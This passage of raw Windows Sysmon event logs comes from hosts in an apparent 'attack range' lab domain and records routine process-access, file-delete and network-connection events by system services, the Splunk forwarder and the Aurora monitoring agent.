Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.571{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3EED2F7778125FE3B7B8D0F36A3A0E5,SHA256=D79279C56F53563173AD3B9A7B5BDA38F568AF2B2DA9FE3F0B3F9F971D650627,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.462{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A446935E02D1D77B0BA422E0EA5F6C5E,SHA256=A7F191FAB65A3E42307504FA546A423FBEB50B0E08F9D9A6A72D8E5D197BD627,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.462{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.462{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.292{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.292{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.292{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.273{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.272{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.160{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.160{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.160{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000045836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.098{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50659- 354300x800000000000000045835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.081{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56442-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 354300x800000000000000045834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.081{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56442-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 23542300x800000000000000045876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:15.922{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40A1B584C75D83C81E97EAE0F0416D7C,SHA256=9E96FDC7FF64D56E208E7D9619EAB7C27E79F31F9A829130AE0443F973BB98A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018178Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:15.583{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB4F51957C68EC2FB0CFE07B90A8603,SHA256=EA896AEC05FEFDF622EF9593EA4422100438AA65FC621598BCEA4039E3386BE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.923{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56443-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.923{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56443-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000018180Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:16.660{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCB0C0674CB9FD77070FEF5E8509BCC,SHA256=CFDFCE26BC0B78967A1A780E9148D8C473FC858D09C6D234004127BA47B3DDC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:16.103{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=20EA5083364699E07C53F800DE910E39,SHA256=7824C78E18E5267EA83DB59CBDC2539DA84D33BB722CADB848251CA11D652952,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.762{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56445-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.762{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56445-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.696{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program 